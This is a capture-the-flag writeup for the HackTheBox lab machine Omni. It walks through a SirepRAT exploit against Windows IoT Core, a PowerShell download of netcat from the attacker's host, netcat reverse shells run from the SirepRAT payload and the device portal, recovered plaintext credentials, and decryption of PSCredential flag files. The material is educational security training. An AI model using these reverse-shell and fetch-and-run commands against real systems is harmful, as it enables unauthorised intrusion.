HackTheBox Omni Writeup – 10.10.10.204

Hello and welcome back to Nav1n’s writeups. HackTheBox Omni (10.10.10.204) is a new IoT box released by HackTheBox on 22nd August. This easy machine, created by egre55, is based on an IoT exploit.

The initial foothold starts with finding the correct PoC for a Windows IoT exploit. The exploit gives a reverse shell, and from there the path leads to an uncommon volume where the user profiles live. Finding both the user and root flags couldn’t be easier, but the flags are actually encrypted.

From there, a hidden file turns up that contains the credentials of Administrator and of another user called App. Logging in to the portal with those creds, a second round of reverse shells is created through the portal’s built-in command runner, and the flag files are decrypted with PowerShell’s Import-Clixml and GetNetworkCredential to get the real flags.


Enumeration

As always, the machine IP goes into my hosts file and I start with an Nmap scan. The Nmap result is as follows.

PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.

There are two ports open: Microsoft Windows RPC on 135 and Microsoft IIS on 8080. Visiting http://omni.htb:8080 prompts for HTTP Basic authentication with the realm “Windows Device Portal”.

A quick Google search shows that the Windows Device Portal (WDP) lets a user configure and manage a device remotely over the local network, which hints that this IoT device is probably Windows-based. As per the documentation, I tried the default credentials Administrator:p@ssw0rd, but they didn’t work.

Doing some research I found an article (Raspberry Pi devices can be hijacked via Windows IoT hack) which says that some Windows-based IoT devices can be exploited through a flaw in their Sirep/WPCon communications protocol. The vulnerability was discovered by security researcher Dor Azouri, who also released a proof-of-concept tool, the SirepRAT remote access Trojan, which is now available on GitHub.

The SirepRAT

To confirm that SirepRAT works against this box, I decided to test it and cloned it into my Kali machine’s Omni working directory.

root@nav1n:~/htb/omni # git clone https://github.com/SafeBreach-Labs/SirepRAT.git
Cloning into 'SirepRAT'...
remote: Enumerating objects: 61, done.
remote: Total 61 (delta 0), reused 0 (delta 0), pack-reused 61
Unpacking objects: 100% (61/61), 5.58 MiB | 1.49 MiB/s, done.
root@nav1n:~/htb/omni # 

Available commands:

* LaunchCommandWithOutput
* PutFileOnDevice
* GetFileFromDevice
* GetSystemInformationFromDevice
* GetFileInformationFromDevice

I ran a couple of commands from the documentation to make sure it works.

root@nav1n:~/htb/omni/SirepRAT(master) # python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 30, payload peek: 'C:\Data\Users\DefaultAccount'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
root@nav1n:~/htb/omni/SirepRAT(master) # 

Checking the current user (without --as_logged_on_user the command runs as System):

root@nav1n:~/htb/omni/SirepRAT(master) # python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 22, payload peek: 'C:\Data\Users\System'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
root@nav1n:~/htb/omni/SirepRAT(master) # 

Going further, the hostname is found: omni

root@nav1n:~/htb/omni/SirepRAT(master) # python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe" --v
---------
omni
---------

The Reverse Shell

SirepRAT can pass PowerShell arguments, so the PowerShell cmdlet Invoke-WebRequest can be used to pull a netcat binary onto Omni, execute it, and get a reverse shell as System.

Steps:

  • Host a Python SimpleHTTPServer
  • Run a listener
  • Copy the netcat Windows exe to the webserver directory
  • Run the argument:
--args "/c powershell.exe Invoke-Webrequest -OutFile C:\temp\nc64.exe -Uri http://10.10.14.21:8000/nc64.exe"

This downloads netcat into the \temp\ directory, from where it can be executed without worrying about triggering UAC.

The HTTP server log confirmed that netcat was successfully served to Omni. Next, I need to execute it so that my listener gets the reverse shell.

Let us do it.

The command is simple; the new argument, --args "/c C:\Windows\temp\nc64.exe 10.10.14.21 9999 -e cmd.exe", gives us a reverse shell on the listener.

Enumerating further, I noticed there is only a Public user on the system drive. That can’t be right; on IoT Core the user profiles live on another drive.

C:\Users>dir
dir
 Volume in drive C is MainOS
 Volume Serial Number is 3C37-C677

 Directory of C:\Users

10/26/2018  11:37 PM    <DIR>          .
10/26/2018  11:37 PM    <DIR>          ..
10/26/2018  11:37 PM    <DIR>          Public
               0 File(s)              0 bytes
               3 Dir(s)     574,689,280 bytes free

Running wmic I noticed several volumes attached to the system: C:, D: and U:

C:\>wmic logicaldisk get deviceid, volumename, description
wmic logicaldisk get deviceid, volumename, description
Description                   = Local Fixed Disk
DeviceID                      = C:
VolumeName                    = MainOS
Description                   = CD-ROM Disc
DeviceID                      = D:
VolumeName                    = 
DeviceID                      = U:
VolumeName                    = Data

Reading D: gives the error “The device is not ready.”, but U: seems to have something interesting.

Listing the Users directory on the U: drive, I found the Administrator, App, DevToolsUser, Public and System accounts.

U:\Users>dir
dir
 Volume in drive U is Data
 Volume Serial Number is 6A37-E09E

 Directory of U:\Users

08/23/2020  10:05 PM    <DIR>          .
08/23/2020  10:05 PM    <DIR>          ..
07/04/2020  09:48 PM    <DIR>          administrator
07/04/2020  09:53 PM    <DIR>          app
07/03/2020  11:22 PM    <DIR>          DefaultAccount
08/24/2020  07:59 AM    <DIR>          DevToolsUser
08/15/2020  05:38 PM            45,272 nc64.exe
08/24/2020  09:05 AM    <DIR>          Public
07/04/2020  10:29 PM    <DIR>          System
               1 File(s)         45,272 bytes
               8 Dir(s)   4,690,460,672 bytes free

U:\Users>

Oddly, I was able to access both the Administrator and App directories and read root.txt and user.txt, but their contents don’t look like flags. On closer inspection, each is a serialized System.Management.Automation.PSCredential object with an encrypted password, which is the format PowerShell uses when it stores credentials to disk.

Administrator

01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7

User App

01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7

A Story Of a Hidden File

There is a hidden bat file buried somewhere on C:, a hint I was given, so I decided to try my luck with a PowerShell command that pulls every “bat” file. Running Get-ChildItem to search for files with *bat* in their name, I got the following result (Note: I snipped the long result).

C:\>powershell.exe
powershell.exe
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\> Get-Childitem -Path C:\ -Include *bat* -File -Recurse -ErrorAction SilentlyContinue -force
Get-Childitem -Path C:\ -Include *bat* -File -Recurse -ErrorAction SilentlyContinue -force
    Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a-h--        8/21/2020  12:56 PM            247 r.bat                         
    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       10/26/2018  11:36 PM            925 Pester.bat                    
    Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----       10/26/2018  11:36 PM            744 Build.bat                     
    Directory: C:\test
Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----        6/11/2020   7:43 AM          32976 winPEAS.bat                   
PS C:\> 

Luckily, the first file, r.bat, is the one I’m looking for: it contains credentials for Administrator as well as for the user App.

The content:

type r.bat
@echo off
:LOOP
for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT

The batch file loops forever, removing every member of the local Administrators group and resetting the app and administrator passwords. That doesn’t matter, as we now have the credentials. Testing the App user credential (app:mesh5143), I successfully logged into the portal.

Looking around the portal, there is a Run command feature that allows us to run commands as the logged-in user on the Omni machine. The Administrator credentials also worked for logging into the portal.

Let’s make a reverse shell

Running another listener and executing the following command from the portal as App, I got a reverse shell as App.

c:\Windows\temp\nc64.exe 10.10.14.21 9988 -e powershell.exe

Now, as the App user, I can import the serialized file and recreate the object using Import-Clixml, which returns objects deserialized from stored CLIXML files.

A CLIXML file is imported into a PowerShell object with the command below. In our case the file has a .txt extension instead of .xml, so we just point the path at the .txt file instead.

$Processes = Import-Clixml -Path .\pi.xml

Once the object is imported, the SecureString password still has to be decrypted, which is done with the following command:

PS C:\> $credential.GetNetworkCredential().Password

Putting it all together, we can decrypt the string. From the App shell, let us decrypt the user flag.

User.txt

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\app\user.txt
$credential = Import-CliXml -Path U:\Users\app\user.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
PS C:\windows\system32> 
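To show what the flag files actually are, and why they only decrypt from the right user’s shell, here is an added PowerShell example (not code from the original writeup) that round-trips a constructed PSCredential through Export-Clixml and Import-Clixml; the file path, user name and password in it are made up.

```powershell
# Added example, not from the original writeup: round-trip a PSCredential through
# Export-Clixml / Import-Clixml to show what the "encrypted flag" files are.
# Assumptions: Windows PowerShell 5.1, every step run as the same Windows user;
# the path, user name and password below are constructed sample values.
$path = Join-Path $env:TEMP 'clixml-demo.xml'

# Build a credential with a constructed password.
$secure = ConvertTo-SecureString 'S4mpl3-P@ss' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ('omni\app', $secure)

# Export-Clixml serializes the object. The SecureString is not written in clear:
# on Windows it is protected with DPAPI in CurrentUser scope, i.e. bound to the
# exporting user's logon secret on this machine.
$cred | Export-Clixml -Path $path

# Inspect the on-disk form: CLIXML with the password as an <SS> (SecureString) hex blob.
$raw = Get-Content -Path $path -Raw
if ($raw -match '<SS N="Password">([0-9a-f]+)</SS>') {
    $blob = $Matches[1]
    # Every DPAPI blob starts with version 01000000 followed by the fixed DPAPI
    # provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian byte
    # order, which is exactly the prefix seen in the root.txt / user.txt contents.
    "DPAPI header : " + $blob.Substring(0, 40)
    "Blob length  : $($blob.Length) hex chars"
}

# Import-Clixml rebuilds the PSCredential; the file extension does not matter.
$restored = Import-Clixml -Path $path

# GetNetworkCredential() decrypts the SecureString back to plain text. This only
# works for the user who exported it; any other user typically gets a DPAPI error
# such as "Key not valid for use in specified state".
$restored.UserName
$restored.GetNetworkCredential().Password

Remove-Item -Path $path -Force
```

The DPAPI binding is the reason the writeup needs a shell as App and as Administrator respectively: the files are readable from the System shell, but only the exporting user can decrypt them.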

Now that we have the user flag, let us go back to http://omni.htb:8080 and log in with the Administrator credentials (administrator:_1nt3rn37ofTh1nGz).

Run the same command again from the Administrator session:

c:\Windows\temp\nc64.exe 10.10.14.21 9988 -e powershell.exe

This starts the netcat reverse shell as Administrator. Let us run the same commands as we did for user App against root.txt and get the root flag decrypted.

Root.txt

PS C:\windows\system32> $credential = Import-CliXml -Path U:\Users\administrator\root.txt
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
PS C:\windows\system32> $credential.GetNetworkCredential().Password
$credential.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\windows\system32> 

That’s all. Thank you for being a loyal reader. See you soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n
